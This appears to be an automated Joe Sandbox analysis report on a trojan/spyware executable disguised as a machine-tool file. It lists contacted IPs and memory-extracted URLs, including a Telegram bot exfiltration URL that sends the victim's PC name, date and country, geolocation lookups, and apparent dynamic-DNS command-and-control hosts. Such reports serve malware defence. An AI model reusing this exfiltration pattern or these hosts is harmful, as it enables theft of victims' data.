                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          		unknown
                          http://checkip.dyndns.org/false
                            		unknown
                            https://reallyfreegeoip.org/xml/191.96.150.187false
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrowSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://duckduckgo.com/ac/?q=SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/downloadSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://api.telegram.orgSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://api.telegram.org/botSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://eicar.org/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXESM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://support.google.com/chrome/?p=plugin_flashSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000364C3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-nSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://chrome.google.com/webstore?hl=enSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://varders.kozow.com:8081SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.google.comSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.eicar.org/download-anti-malware-testfile/:SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttpSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://chrome.google.com/webstore?hl=enlBZrSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000362ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339BSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://drive.google.com/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://secure.eicar.org/eicar.com;SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://api.telegramSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292KSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://secure.eicar.org/eicar.com.txtDSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bTSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://apis.google.comSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://ocsp.quovadisoffshore.com0SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://reallyfreegeoip.org/xml/191.96.150.187$SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036372000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://beta.visualstudio.net/net/sdk/feedback.aspSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5974467463.00000000710C1000.00000020.00000001.01000000.0000000C.sdmpfalse
                                                                                                		unknown
                                                                                                https://drive.google.com/?SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.0000000005938000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.office.com/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036316000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://secure.eicar.org/eicar.comSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exeSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://packetstormsecurity.com/files/download/22459/BIOS320.EXESM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://drive.usercontent.google.com/XSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://drive.usercontent.google.com/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://checkip.dyndns.orgSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://nsis.sf.net/NSIS_ErrorErrorSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000002.1493160105.0000000000409000.00000004.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 00000000.00000000.858359986.0000000000409000.00000008.00000001.01000000.00000003.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036295000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://secure.eicar.org/eicar.com.txt/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://www.google.com/search?q=eicarSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://secure.eicar.org/eicar.com/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://aborters.duckdns.org:8081SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://www.autoitscript.com/site/autoit/downloads/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://www.eicar.org/download-anti-malware-testfile/DownloadSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://www.eicar.org/download-anti-malware-testfile/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://nsis.sf.net/NSIS_ErrorSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000000.1371592231.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20aSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://packetstormsecurity.com/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://anotherarmy.dns.army:8081SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://www.eicar.org/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://www.quovadis.bm0SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://api.telegram.orgSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036386000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://www.google.com/SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://secure.eicar.org/eicar.com.txtSM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown

                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public IPs

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              142.250.80.46
                                                                                                                                                              		drive.google.comUnited States
                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                              149.154.167.220
                                                                                                                                                              		api.telegram.orgUnited Kingdom
                                                                                                                                                              		62041TELEGRAMRUtrue
                                                                                                                                                              142.250.65.225
                                                                                                                                                              		drive.usercontent.google.comUnited States
                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                              172.67.177.134
                                                                                                                                                              		reallyfreegeoip.orgUnited States
                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                              132.226.247.73
                                                                                                                                                              		checkip.dyndns.comUnited States
                                                                                                                                                              		16989UTMEMUSfalse

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                              Analysis ID:1527845
                                                                                                                                                              Start date and time:2024-10-07 10:52:21 +02:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 16m 32s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                              Run name:Suspected Instruction Hammering
                                                                                                                                                              Number of analysed new started processes analysed:15
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample name:SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@3/9@5/5
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 97%
